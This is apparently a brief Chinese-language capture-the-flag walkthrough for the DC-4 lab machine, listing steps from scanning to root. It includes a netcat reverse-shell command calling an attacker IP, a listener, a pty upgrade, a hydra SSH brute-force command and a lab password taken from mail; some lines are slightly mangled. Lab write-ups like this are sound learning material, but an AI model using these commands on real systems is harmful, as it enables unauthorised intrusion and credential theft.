入侵靶机DC-4

1.主机扫描

2.端口扫描

3.测试访问web服务器页面

4.尝试爆破web登录界面

cd /usr/share/john/

cp password.ist ~/Desktop

5.抓取命令包

7.执行命令反弹shell

nc+10.3.139.75+666+-e+/bin/bashls

sudo nc -lvvp 666

python -c ‘import pty;pty.spawn("/bin/sh")’
 

8.查看用户

9.根据提示密码本破解家目录下的所有用户

hydra -L user.txt -P pass.txt ssh://10.3.139.72

10.SSH登录jim用户

cd /var/mail/

11.根据邮件上的密码登录charles用户

ssh [email protected]
Password is:  ^xHhA&hvim0y

12.切到wxk用户  获得root权限

13.切到root目录下，查看flag